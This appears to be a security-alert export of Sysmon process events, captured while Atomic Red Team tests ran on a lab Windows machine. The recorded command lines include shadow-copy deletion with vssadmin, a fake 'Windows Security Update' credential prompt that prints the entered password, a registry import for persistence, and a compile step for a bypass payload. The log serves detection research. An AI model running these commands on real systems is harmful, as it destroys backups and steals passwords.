[T1059] Command-Line Interface,1563547665.585327,2019-07-19T18:47:45.585327+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:47:40.863055Z"">
</TimeCreated>
<EventRecordID>3640</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:47:40.849</Data>
<Data Name=""ProcessGuid"">747F3D96-D80C-5D31-0000-001005542B00</Data>
<Data Name=""ProcessId"">1348</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547660.70604,2019-07-19T18:47:40.706040+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;vssadmin.exe delete shadows /all /quiet&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:47:40.691438Z"">
</TimeCreated>
<EventRecordID>3638</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:47:40.568</Data>
<Data Name=""ProcessGuid"">747F3D96-D80C-5D31-0000-0010223C2B00</Data>
<Data Name=""ProcessId"">6896</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;vssadmin.exe delete shadows /all /quiet&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547660.691438,2019-07-19T18:47:40.691438+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:47:37.215704Z"">
</TimeCreated>
<EventRecordID>3637</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:47:37.170</Data>
<Data Name=""ProcessGuid"">747F3D96-D809-5D31-0000-001072292B00</Data>
<Data Name=""ProcessId"">980</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547657.127263,2019-07-19T18:47:37.127263+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg.exe import c:\AtomicRedTeam\atomics\T1103\T1103.reg&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:47:37.096237Z"">
</TimeCreated>
<EventRecordID>3633</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:47:37.083</Data>
<Data Name=""ProcessGuid"">747F3D96-D809-5D31-0000-00100A242B00</Data>
<Data Name=""ProcessId"">3968</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg.exe import c:\AtomicRedTeam\atomics\T1103\T1103.reg&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T1086 ] Powershell with Suspicious Argument,1563547641.972037,2019-07-19T18:47:21.972037+04:00,,Threat,Critical,"Found User (MSEDGEWIN10\IEUser) run Suspicious PowerShell commands that include (powershell,PromptForCredential,powershell,PromptForCredential) in event with Command Line (powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential(&apos;Windows Security Update&apos;, &apos;&apos;,[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential(&apos;Windows Security Update&apos;, &apos;&apos;,[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}&quot;) in directory : ( C:\AtomicRedTeam\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:46:51.957887Z"">
</TimeCreated>
<EventRecordID>3631</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:46:51.935</Data>
<Data Name=""ProcessGuid"">747F3D96-D7DB-5D31-0000-0010B5A82A00</Data>
<Data Name=""ProcessId"">4452</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows PowerShell</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential(&apos;Windows Security Update&apos;, &apos;&apos;,[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D7DB-5D31-0000-001089A52A00</Data>
<Data Name=""ParentProcessId"">4256</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential(&apos;Windows Security Update&apos;, &apos;&apos;,[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1086] PowerShell Process found,1563547641.972037,2019-07-19T18:47:21.972037+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential(&apos;Windows Security Update&apos;, &apos;&apos;,[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;} )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:46:51.957887Z"">
</TimeCreated>
<EventRecordID>3631</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:46:51.935</Data>
<Data Name=""ProcessGuid"">747F3D96-D7DB-5D31-0000-0010B5A82A00</Data>
<Data Name=""ProcessId"">4452</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows PowerShell</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential(&apos;Windows Security Update&apos;, &apos;&apos;,[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D7DB-5D31-0000-001089A52A00</Data>
<Data Name=""ParentProcessId"">4256</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential(&apos;Windows Security Update&apos;, &apos;&apos;,[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547611.957887,2019-07-19T18:46:51.957887+04:00,,Threat,Low,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential(&apos;Windows Security Update&apos;, &apos;&apos;,[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}&quot; )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:46:51.883827Z"">
</TimeCreated>
<EventRecordID>3630</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:46:51.871</Data>
<Data Name=""ProcessGuid"">747F3D96-D7DB-5D31-0000-001089A52A00</Data>
<Data Name=""ProcessId"">4256</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential(&apos;Windows Security Update&apos;, &apos;&apos;,[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T0000 ] Suspicious process name detected,1563547579.443587,2019-07-19T18:46:19.443587+04:00,,Threat,High,User Name : ( MSEDGEWIN10\IEUser ) with Command Line : ( &quot;C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe&quot; /r:System.EnterpriseServices.dll /target:library /keyfile:key.snk C:\AtomicRedTeam\atomics\T1121\src\T1121.cs ) contain suspicious command ( \csc.exe),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:46:19.052666Z"">
</TimeCreated>
<EventRecordID>3617</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:46:19.023</Data>
<Data Name=""ProcessGuid"">747F3D96-D7BB-5D31-0000-0010E7FE2900</Data>
<Data Name=""ProcessId"">2056</Data>
<Data Name=""Image"">C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe</Data>
<Data Name=""FileVersion"">4.7.3190.0 built by: NET472REL1LAST_C</Data>
<Data Name=""Description"">Visual C# Command Line Compiler</Data>
<Data Name=""Product"">Microsoft® .NET Framework</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe&quot; /r:System.EnterpriseServices.dll /target:library /keyfile:key.snk C:\AtomicRedTeam\atomics\T1121\src\T1121.cs</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=ABAF24113034BBA4B4F4AC19D9097D36943D2E35,MD5=B87EE552626023951A7F03F2D31DA8A7,SHA256=D511363874B2A00D3DA5A20E6AE826334795A3A52AB5F8555C309D8068F5915B,IMPHASH=C4963CB3AF58DCFC863E42DD3B6FB80D</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547579.052666,2019-07-19T18:46:19.052666+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:45:56.069498Z"">
</TimeCreated>
<EventRecordID>3616</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:45:56.040</Data>
<Data Name=""ProcessGuid"">747F3D96-D7A4-5D31-0000-001020C62900</Data>
<Data Name=""ProcessId"">4080</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547772.743506,2019-07-19T18:49:32.743506+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:49:32.728253Z"">
</TimeCreated>
<EventRecordID>3695</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:49:32.710</Data>
<Data Name=""ProcessGuid"">747F3D96-D87C-5D31-0000-0010CA5B3100</Data>
<Data Name=""ProcessId"">956</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
